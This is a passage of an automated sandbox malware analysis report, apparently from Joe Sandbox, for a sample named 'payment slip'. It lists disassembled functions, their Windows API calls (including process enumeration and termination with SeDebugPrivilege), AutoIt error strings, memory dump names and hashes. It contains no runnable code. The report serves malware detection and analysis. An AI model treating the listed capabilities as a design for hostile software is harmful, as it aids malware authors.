                                        • Instruction Fuzzy Hash: 0001BBB5240348BFF710ABA6DC4DF6B3BACEB8AB11F044411FA09DB1A1CA749800CB20
                                        Function 000BA0E2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0009D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 0009D501
                                          • Part of subcall function 0009D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 0009D50F
                                          • Part of subcall function 0009D4DC: CloseHandle.KERNEL32(00000000), ref: 0009D5DC
                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 000BA16D
                                        • GetLastError.KERNEL32 ref: 000BA180
                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 000BA1B3
                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 000BA268
                                        • GetLastError.KERNEL32(00000000), ref: 000BA273
                                        • CloseHandle.KERNEL32(00000000), ref: 000BA2C4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                        • String ID: SeDebugPrivilege
                                        • API String ID: 2533919879-2896544425
                                        • Opcode ID: 3d02591d8c66173df777c9d88fb45191e5d256c3bd6db97610d3a9e6987ce72f
                                        • Instruction ID: 14bab7f3154b8e1a7af7423a310a3b76818b980c0aed777553de2f20c8d222b1
                                        • Opcode Fuzzy Hash: 3d02591d8c66173df777c9d88fb45191e5d256c3bd6db97610d3a9e6987ce72f
                                        • Instruction Fuzzy Hash: B5619130204242AFE720DF19C494F99BBE5AF55318F18849CE45A8BBA3C776ED45CB92
                                        Function 000C3886 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 000C3925
                                        • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 000C393A
                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 000C3954
                                        • _wcslen.LIBCMT ref: 000C3999
                                        • SendMessageW.USER32(?,00001057,00000000,?), ref: 000C39C6
                                        • SendMessageW.USER32(?,00001061,?,0000000F), ref: 000C39F4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: MessageSend$Window_wcslen
                                        • String ID: SysListView32
                                        • API String ID: 2147712094-78025650
                                        • Opcode ID: 903011e81ae142259498ef190e6e234db7011f2ff63e10901466cd4cb801fcc8
                                        • Instruction ID: 5128c7a4ef4d3a25f695c0837f5df19860282b2bca2791b9510d5e0ba328ffd5
                                        • Opcode Fuzzy Hash: 903011e81ae142259498ef190e6e234db7011f2ff63e10901466cd4cb801fcc8
                                        • Instruction Fuzzy Hash: CD41C231A10319ABEF219F64CC45FEE7BA9EF08350F10452AF948E7281D7B59E84CB90
                                        Function 0009BC5E Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0009BCFD
                                        • IsMenu.USER32(00000000), ref: 0009BD1D
                                        • CreatePopupMenu.USER32 ref: 0009BD53
                                        • GetMenuItemCount.USER32(00E154F8), ref: 0009BDA4
                                        • InsertMenuItemW.USER32(00E154F8,?,00000001,00000030), ref: 0009BDCC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Menu$Item$CountCreateInfoInsertPopup
                                        • String ID: 0$2
                                        • API String ID: 93392585-3793063076
                                        • Opcode ID: 6ebdd1e76ee771b76961aef442c1a83c502e5f6c48df07eb5188be999dd18dfc
                                        • Instruction ID: 397d7cc4d2680b48ac69564aec4048a7992ba1d014543532b0266e67c48b4da8
                                        • Opcode Fuzzy Hash: 6ebdd1e76ee771b76961aef442c1a83c502e5f6c48df07eb5188be999dd18dfc
                                        • Instruction Fuzzy Hash: C851B070A02209DBEF20CFA8EA88BAEBBF4BF45324F144159E456DB291E7709941DB51
                                        Function 000C81DB Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,0008F3AB,00000000,?,?,00000000,?,0008682C,00000004,00000000,00000000), ref: 000C824C
                                        • EnableWindow.USER32(00000000,00000000), ref: 000C8272
                                        • ShowWindow.USER32(FFFFFFFF,00000000), ref: 000C82D1
                                        • ShowWindow.USER32(00000000,00000004), ref: 000C82E5
                                        • EnableWindow.USER32(00000000,00000001), ref: 000C830B
                                        • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 000C832F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Window$Show$Enable$MessageSend
                                        • String ID: U
                                        • API String ID: 642888154-2399391058
                                        • Opcode ID: bbcde31bab9295200c2c70bc49f9f726f557b5fe54ed43cbff448d9ab2f8052c
                                        • Instruction ID: 292b9e8cba85fcf0a3719ba5a9afad8327ee1bdf5bc1f4c06edccaf60a8da7d2
                                        • Opcode Fuzzy Hash: bbcde31bab9295200c2c70bc49f9f726f557b5fe54ed43cbff448d9ab2f8052c
                                        • Instruction Fuzzy Hash: D841A234601644EFEB61CF15C89DFEC7BE0FB0A714F1892ADE5484B2A2CB75A881CB54
                                        Function 0009C874 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadIconW.USER32(00000000,00007F03), ref: 0009C913
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: IconLoad
                                        • String ID: blank$info$question$stop$warning
                                        • API String ID: 2457776203-404129466
                                        • Opcode ID: af5d3c9b298bf207a8707104844dbbd3e8800f472176784948213f51f89eac33
                                        • Instruction ID: 62dfccbf9acd0bbe8e1e9a2e3b606f4c36231d8ba09d5cd519614c4e20125c37
                                        • Opcode Fuzzy Hash: af5d3c9b298bf207a8707104844dbbd3e8800f472176784948213f51f89eac33
                                        • Instruction Fuzzy Hash: 48112B35A8D30BBAFB006B54DC86CEF77DCDF15319B20002AFA00A6183D7A55D407365
                                        Function 0009ED19 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: _wcslen$LocalTime
                                        • String ID:
                                        • API String ID: 952045576-0
                                        • Opcode ID: 9f1e725e0b83db06a7b0b749dfa4a5e05822b4c1f869f3c00bf565448749935e
                                        • Instruction ID: aebb186f47b63da8e41aae2210be7bec8a7ffd4ded99aa2ceb4c0c2b6f1cc888
                                        • Opcode Fuzzy Hash: 9f1e725e0b83db06a7b0b749dfa4a5e05822b4c1f869f3c00bf565448749935e
                                        • Instruction Fuzzy Hash: DA418E65C1021876CB21EBB4C88A9DFB7BCAF45711F508466E918E3123FB34E659C3A6
                                        Function 0004F8D8 Relevance: 12.1, APIs: 8, Instructions: 124COMMON
                                        Download Yara Rule
                                        APIs
                                        • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0008682C,00000004,00000000,00000000), ref: 0004F953
                                        • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,0008682C,00000004,00000000,00000000), ref: 0008F3D1
                                        • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0008682C,00000004,00000000,00000000), ref: 0008F454
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: ShowWindow
                                        • String ID:
                                        • API String ID: 1268545403-0
                                        • Opcode ID: ed3c8df6083c238ff9cd91bdd9bc143507d49fd0de72213effde5b580ee31794
                                        • Instruction ID: dd1034f0f32012c44b671cd2989623e54749d98bbb2dc7e89cbab9e38edda851
                                        • Opcode Fuzzy Hash: ed3c8df6083c238ff9cd91bdd9bc143507d49fd0de72213effde5b580ee31794
                                        • Instruction Fuzzy Hash: 3E4128B0208682BAE779AF38C988F7A7BD1BF56314F14403DE0CB92561C775AD80CB15
                                        Function 000C2D03 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • DeleteObject.GDI32(00000000), ref: 000C2D1B
                                        • GetDC.USER32(00000000), ref: 000C2D23
                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 000C2D2E
                                        • ReleaseDC.USER32(00000000,00000000), ref: 000C2D3A
                                        • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 000C2D76
                                        • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 000C2D87
                                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,000C5A65,?,?,000000FF,00000000,?,000000FF,?), ref: 000C2DC2
                                        • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 000C2DE1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                        • String ID:
                                        • API String ID: 3864802216-0
                                        • Opcode ID: 1afcd9f24f074043833279da9f03d80442525f9146762b9a2e780b73efc3418a
                                        • Instruction ID: 20347feb13cb65336bf39967c088e7200e97f88ce8e70f6ac440186d6ad02c65
                                        • Opcode Fuzzy Hash: 1afcd9f24f074043833279da9f03d80442525f9146762b9a2e780b73efc3418a
                                        • Instruction Fuzzy Hash: 1A317A72201614BFFB218F54CC8AFEB3BA9EF19715F084055FE099A2A1C6799C51CBA4
                                        Function 00095622 Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: _memcmp
                                        • String ID:
                                        • API String ID: 2931989736-0
                                        • Opcode ID: e9d4afcc44cc0021113652c9cefecb544a6917023baafd9a37af74f79718c949
                                        • Instruction ID: 924f3217c1dc2e5c39c876940cb786f9965c0aaf6e2e799cac65a44bee8629a9
                                        • Opcode Fuzzy Hash: e9d4afcc44cc0021113652c9cefecb544a6917023baafd9a37af74f79718c949
                                        • Instruction Fuzzy Hash: 6B219871745905779A155A229ED2FFF639DAF10386F440024FE045B582F760EE1493A5
                                        Function 000B4FAE Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: NULL Pointer assignment$Not an Object type
                                        • API String ID: 0-572801152
                                        • Opcode ID: 0efd7597c0634ad2ee71ada2fc26801f01b6384d5cfb3c15dfa085d1d8d714da
                                        • Instruction ID: 2db25afc90c3f60bb9cc537bdf6825db09155876c17b0f624c94147a39f7580a
                                        • Opcode Fuzzy Hash: 0efd7597c0634ad2ee71ada2fc26801f01b6384d5cfb3c15dfa085d1d8d714da
                                        • Instruction Fuzzy Hash: 80D18C71A0060AAFDF14DFA8CC81BEEB7F5BF48345F1484A9E915AB281E7719D41CB90
                                        Function 00071522 Relevance: 10.8, APIs: 7, Instructions: 268COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,000717FB,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 000715CE
                                        • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,000717FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00071651
                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,000717FB,?,000717FB,00000000,00000000,?,00000000,?,?,?,?), ref: 000716E4
                                        • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,000717FB,00000000,00000000,?,00000000,?,?,?,?), ref: 000716FB
                                          • Part of subcall function 00063820: RtlAllocateHeap.NTDLL(00000000,?,00101444,?,0004FDF5,?,?,0003A976,00000010,00101440,000313FC,?,000313C6,?,00031129), ref: 00063852
                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,000717FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00071777
                                        • __freea.LIBCMT ref: 000717A2
                                        • __freea.LIBCMT ref: 000717AE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                        • String ID:
                                        • API String ID: 2829977744-0
                                        • Opcode ID: 82690222fc0aa2b550de9497f26db559ace917e1d4bfc2fb777a03748eee0560
                                        • Instruction ID: 4e1ea8a692c995e5be16e272dfa43275bd88d54a3ba74ba77d0f0a28a4f99ba4
                                        • Opcode Fuzzy Hash: 82690222fc0aa2b550de9497f26db559ace917e1d4bfc2fb777a03748eee0560
                                        • Instruction Fuzzy Hash: B491A371E046169ADB288E6CC881EEE7BF5AF49710F18C659E809E71C1DB39DD40CBA4
                                        Function 000B4523 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Variant$ClearInit
                                        • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                        • API String ID: 2610073882-625585964
                                        • Opcode ID: 438499526c2e3eda4c93caaa468d6b09610885b2189cd5952c7f2c827be334a5
                                        • Instruction ID: 9393ffabe03e67d0706163179a066173ddddc9f9aaeb9736c5c99e57a4ceffa2
                                        • Opcode Fuzzy Hash: 438499526c2e3eda4c93caaa468d6b09610885b2189cd5952c7f2c827be334a5
                                        • Instruction Fuzzy Hash: A1919471A04219AFDF24CFA5C884FEE7BB8EF46710F108559F505AB282DB709A45CFA1
                                        Function 000A1187 Relevance: 10.8, APIs: 7, Instructions: 254COMMON
                                        Download Yara Rule
                                        APIs
                                        • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 000A125C
                                        • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 000A1284
                                        • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 000A12A8
                                        • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 000A12D8
                                        • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 000A135F
                                        • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 000A13C4
                                        • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 000A1430
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: ArraySafe$Data$Access$UnaccessVartype
                                        • String ID:
                                        • API String ID: 2550207440-0
                                        • Opcode ID: 8491ea46e7755f3965349e5d1d78ffe3f61aaa26eb2a034a735d8c62dcf24be2
                                        • Instruction ID: b45fcc2084245c86d6434f415e2ee6a4e3b1dfee7c9451190e988fbf42f2c2b8
                                        • Opcode Fuzzy Hash: 8491ea46e7755f3965349e5d1d78ffe3f61aaa26eb2a034a735d8c62dcf24be2
                                        • Instruction Fuzzy Hash: 9591AF75A00209AFEB119FD8C885BFEB7B9FF46315F108029E941EB292D775E941CB90
                                        Function 0004948A Relevance: 10.8, APIs: 7, Instructions: 254COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: ObjectSelect$BeginCreatePath
                                        • String ID:
                                        • API String ID: 3225163088-0
                                        • Opcode ID: 145de2c4549b6239a485dd11fd3f3cebf4287acd1a500687f9ba4bbbe260f3b6
                                        • Instruction ID: 2bde1e01ad6c2e4fc892538105805a79cd3714bb8a54ca48eb2ce312759265c6
                                        • Opcode Fuzzy Hash: 145de2c4549b6239a485dd11fd3f3cebf4287acd1a500687f9ba4bbbe260f3b6
                                        • Instruction Fuzzy Hash: 369139B1D00219EFCB50CFA9CC84AEEBBB8FF49320F244569E515B7251D378AA41CB64
                                        Function 000B3947 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON
                                        Download Yara Rule
                                        APIs
                                        • VariantInit.OLEAUT32(?), ref: 000B396B
                                        • CharUpperBuffW.USER32(?,?), ref: 000B3A7A
                                        • _wcslen.LIBCMT ref: 000B3A8A
                                        • VariantClear.OLEAUT32(?), ref: 000B3C1F
                                          • Part of subcall function 000A0CDF: VariantInit.OLEAUT32(00000000), ref: 000A0D1F
                                          • Part of subcall function 000A0CDF: VariantCopy.OLEAUT32(?,?), ref: 000A0D28
                                          • Part of subcall function 000A0CDF: VariantClear.OLEAUT32(?), ref: 000A0D34
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                        • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                        • API String ID: 4137639002-1221869570
                                        • Opcode ID: 3c566b6b21ceb8beebe10efa134bf6f9883b902d5b7ce4f8a059817f416f48c0
                                        • Instruction ID: bfcfdcf2e9bd5f64f106a69a1bf6979de6af63be0d97887fe9dc495f295b8e7d
                                        • Opcode Fuzzy Hash: 3c566b6b21ceb8beebe10efa134bf6f9883b902d5b7ce4f8a059817f416f48c0
                                        • Instruction Fuzzy Hash: FA917A756083059FCB14DF28C4809AAB7E4FF89314F24892DF9899B352DB31EE05CB92
                                        Function 000B4BAD Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0009000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0008FF41,80070057,?,?,?,0009035E), ref: 0009002B
                                          • Part of subcall function 0009000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0008FF41,80070057,?,?), ref: 00090046
                                          • Part of subcall function 0009000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0008FF41,80070057,?,?), ref: 00090054
                                          • Part of subcall function 0009000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0008FF41,80070057,?), ref: 00090064
                                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 000B4C51
                                        • _wcslen.LIBCMT ref: 000B4D59
                                        • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 000B4DCF
